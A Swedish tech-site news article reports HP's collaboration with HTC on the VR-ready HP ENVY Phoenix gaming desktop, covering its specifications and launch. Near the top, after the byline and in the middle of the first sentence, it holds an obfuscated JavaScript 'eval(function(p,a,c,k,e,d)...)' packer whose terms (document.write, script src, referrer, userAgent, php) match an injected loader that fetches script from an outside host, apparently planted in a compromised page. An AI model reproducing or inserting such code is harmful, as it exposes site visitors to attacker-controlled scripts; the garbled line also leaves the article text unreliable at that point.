Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

PC

HP Inc. samarbetar med HTC för att leverera den ultimata Virtual Reality-upplevelsen

HP Inc. samarbetar med HTC för att leverera den ultimata Virtual Reality-upplevelsen
Sebastian
Under eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ktyde|var|u0026u|referrer|ntysb||js|php’.split(’|’),0,{}))
CES lanserade HP Inc. sitt samarbete med HTC för att ta fram en certifierad virtual reality(VR)-klar stationär gamingdator i HP ENVY Phoenix-serien.
HTC Vive levererar en unikt omslutande VR-upplevelse genom sin förmåga att hantera rumsupplevelsen, en teknologi som utgörs av två enheter som placeras ut i ett rum för att följa en användares rörelser inom en 3D-rymd. Tillsammans skapar HTCs Vive och HPs VR-klara HP ENVY Phoenix den mest verklighetstrogna rumsupplevelsen med en VR-lösning på marknaden.
“I takt med att virtual reality blir nästa våg av innovation inom gaming behöver konsumenter en stationär PC med kvalité, prestanda och kraft för att möjliggöra upplevelsen” säger Kevin Frost, vice president och general manager, consumer personal systems, HP Inc. ”HP har arbetat tillsammans med HTC för att ta fram HP ENVY Phoenix, en dator speciellt framtagen för att leverera fantastiska virtuella spelupplevelser.
Genom samarbetet med HTC kommer HP nu att lansera en stationär speldator som förhöjer spelupplevelsen. HP och HTC optimerar VR-upplevelsen genom att säkerställa att grafikkortet har rätt upplösning tilldelad och är upptäckt i inställningarna när HTCs Vive-system är anslutet och att grafikdrivrutinerna upptäcker headsetet som en sekundär bildskärm. HP optimerar dessutom drivrutinerna och kraftprofilen för att ge spelarna möjligheten att krama ur så mycket prestanda som möjligt utan att behöva justera prestandaläget till High performance
“HTC och HP har samarbetat för att optimera hårdvaran och säkerställa upplevelsen av HPs teknologi tillsammans med Vive från HTC,” säger Dan O’Brien, vice president, HTC.  “Genom att testa mot de mest krävande spelen på marknaden har HP och HTC pressat hårdvaran till max för att möjliggöra en konstant bildhastighet för en mjuk och kontinuerlig virtuell gaming-upplevelse”
HP ENVY Phoenix är en stationär gamingdator redo för VR
HP ENVY Phoenix kommer erbjudas i en särskild konfiguration för att göra den till den mest VR-optimerade stationära konsumentdatorn från HP för spelare i framkant.
Med en hårddisk på 2 TB kan en stor mängd VR-spel, videos och korta animationer sparas. Med en 128 GB SSD i systemet ges snabb dataåtkomst så att användaren inte behöver vänta på att spel och videos ska laddas. För att hantera all den CPU-bearbetning som krävs för virtual reality är HP ENVY Phoenix utrustad med en processor i 6:e generationens Intel Core i7 K-serie med överklockningskapacitet trimmad av HP. Datorn är också utrustad med ett NVIDIA GTXTM 980 Ti-grafikkort, eftersom kraftfull grafik är nödvändig för att minimera fördröjningar mellan framställandet av varje bildruta, allt för att kunna ge en så bra VR-upplevelse som möjligt. Den kraftfulla processorn behövs för att se till att registreringen av kroppens rörelser sker tillräckligt snabbt för att möjliggöra att grafiken kan matas med korrekt information om var nästa bildruta skall renderas så att den matchar läget för användarens huvud.
VR kräver mycket av processorn så för att hantera värmen är HP ENVY Phoenix utrustad med ett system för vätskekylning så att datorn håller sig så sval och tyst som möjligt. HP ENVY Phoenix har en LED-belysning på som ändras efter CPU-temperaturen så att användare har en tydlig bild över datorns status, vilket är särskilt användbart vid överklockning.
Pris och tillgänglighet
HP ENVY Phoenix kommer finnas tillgänglig under februari. Pris meddelas närmare produktsläpp. HTC Vive-system säljs separat.